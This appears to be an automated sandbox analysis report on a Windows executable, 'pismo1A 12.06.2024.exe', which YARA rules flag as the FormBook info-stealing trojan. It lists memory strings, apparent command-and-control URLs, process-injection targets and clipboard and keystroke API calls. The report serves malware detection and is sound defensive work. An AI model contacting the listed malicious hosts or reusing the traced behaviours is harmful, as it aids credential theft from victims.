Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004758000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://lecoinsa.net/xu8t/?fD=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRGACd0IuiCNlkYArV6F8
Source: write.exe, 00000005.00000002.4491856252.0000000006344000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004434000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4492909372.0000000005860000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lunareafurniture.com
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4492909372.0000000005860000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.lunareafurniture.com/wzcd/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/plugins/quiz-maker/public/css/quiz-maker-public.css?ver=6.3.3.0
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/asset
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/css/font-sizes.min.css?ver=3.0.21
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.21
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: write.exe, 00000005.00000002.4491856252.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000045C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: write.exe, 00000005.00000002.4491856252.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000045C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: write.exe, 00000005.00000002.4491856252.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000045C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C400%2C500%2C700%7CRoboto
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
Source: write.exe, 00000005.00000002.4491856252.0000000006020000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004110000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: write.exe, 00000005.00000002.4491856252.0000000006020000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004110000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://js.users.51.la/21876343.js
Source: write.exe, 00000005.00000002.4488869608.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: write.exe, 00000005.00000002.4488869608.0000000002F71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: write.exe, 00000005.00000002.4488869608.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: write.exe, 00000005.00000002.4488869608.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033o
Source: write.exe, 00000005.00000002.4488869608.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: write.exe, 00000005.00000002.4488869608.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: write.exe, 00000005.00000003.2479250535.0000000007E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://themeisle.com
Source: write.exe, 00000005.00000002.4491856252.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003F7E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: write.exe, 00000005.00000002.4491856252.0000000005CFC000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003DEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.duzane.com/6tsi/?fD=32QAWULDWbDdguRmN
Source: write.exe, 00000005.00000002.4494320573.0000000007E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: write.exe, 00000005.00000002.4491856252.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003AC8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.magnoliahairandco.com/fkxp?fD=%2F8gewv%2F74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfH
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/cloudhost/
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/jiaoyi/
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/domain/
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/mail/
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/services/webhosting/
Source: write.exe, 00000005.00000002.4491856252.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000005.00000002.4494041112.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.00000000048EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.west.cn/ykj/view.asp?domain=zhuan-tou.com
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/blog/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/comments/feed/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/feed/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/kontakt/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/portfolio/
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/projekt-details/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/sample-page/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/ueber/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/verkehrswende/
Source: IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/wp-json/
Source: write.exe, 00000005.00000002.4491856252.0000000005846000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000003936000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.witoharmuth.de/xmlrpc.php?rsd
Source: write.exe, 00000005.00000002.4491856252.0000000006020000.00000004.10000000.00040000.00000000.sdmp, IwDtIjtyhRCIk.exe, 00000006.00000002.4491197058.0000000004110000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zijrmf.com/register

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0071EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0071EAFF

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0071ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0071ED6A

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

0_2_0071EAFF

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_0070AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0070AA57

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_00739576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00739576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2305453955.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4488427436.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4490570249.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4492909372.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4490518264.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2305065893.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2305809093.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4490601720.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: pismo1A 12.06.2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: pismo1A 12.06.2024.exe, 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bc2f0e09-6
Source: pismo1A 12.06.2024.exe, 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_15c2fb31-b
Source: pismo1A 12.06.2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a25284c4-c
Source: pismo1A 12.06.2024.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_f48cea71-a

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042AFB3 NtClose,	2_2_0042AFB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B60 NtClose,LdrInitializeThunk,	2_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,	2_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374340 NtSetContextThread,	2_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374650 NtSuspendThread,	2_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BA0 NtEnumerateValueKey,	2_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B80 NtQueryInformationFile,	2_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BF0 NtAllocateVirtualMemory,	2_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BE0 NtQueryValueKey,	2_2_03372BE0
